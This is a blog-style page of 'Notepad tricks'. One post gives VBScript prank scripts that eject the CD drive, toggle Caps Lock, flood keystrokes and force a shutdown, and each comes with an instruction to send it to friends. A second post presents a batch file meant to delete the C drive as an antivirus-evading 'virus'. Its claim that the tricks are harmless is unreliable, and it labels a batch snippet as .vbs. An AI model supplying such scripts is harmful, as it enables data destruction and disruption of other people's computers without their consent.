Showing posts with label Make Virus Using Notepad. Show all posts
Showing posts with label Make Virus Using Notepad. Show all posts

Latest Notepad Tricks- That Scare Your Friends

Latest Notepad Tricks- That Scare Your Friends



We all know Notepad. It's a simple text editor. But today I am going to discuss some cool tricks which you can perform on your computer using simple notepad. You can use these tricks to scare your friends. 

Please Note -  These tricks will not harm your computer in anyway. After performing these tricks if you want to stop them simply restart your computer or else Open Task Manager ( Ctrl+Alt+Del) go to processes tab and end the process wscript.exe.


1) Continuously Pop out CD or DVD Drive:
Open Notepad.
Copy the code bellow.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Now save as abc.vbs 
Send it to your friend now.

2) Toggle Caps Lock button On-Off Continuously : 
Open Notepad.
Copy the following code.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as abc.vbs
And send it to your friends.

3) Hack keyboard to make it type anything continuously:
Open Notepad and copy the following code.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
You can change You are a fool. to any other text
Save it as abc,vbs 
And send it to your friends 

4) Hit Enter Key Continuously :
Open Notepad and copy the following code.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as abc.vbs
Now sent it to your friends.
5)  Type any message in notepad automatically and scare your friends :
Open Notepad and type the following code.
  

WScript.Sleep 1800
WScript.Sleep 1000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Now save it as abc.vbs
And send it to your friends.
6) Hit Backspace Key Continuously : 
Open Notepad and copy the following code.
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as abc.vbs and send it to your friends.

7) Show a error message and shut down friends computer : 
Open Notepad and copy the following code.
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as abc.vbs and send to your friends.

How To Make Super Dangerous Virus In Just Few Sec

How To Make Super Dangerous Virus In Just Few Sec
Make Virus Using Notepad, Make Dangerous Virus In A Minute, Create a Computer Virus, make virus for android, make virus for pc, make virus in cmd, make virus fud, make virus in java, make virus undetectable, computer tricks, How to Create a Computer Virus Step by Step,  Dangerous Virus In Notepad

Today I will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.


What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus on Your Own?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.



Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.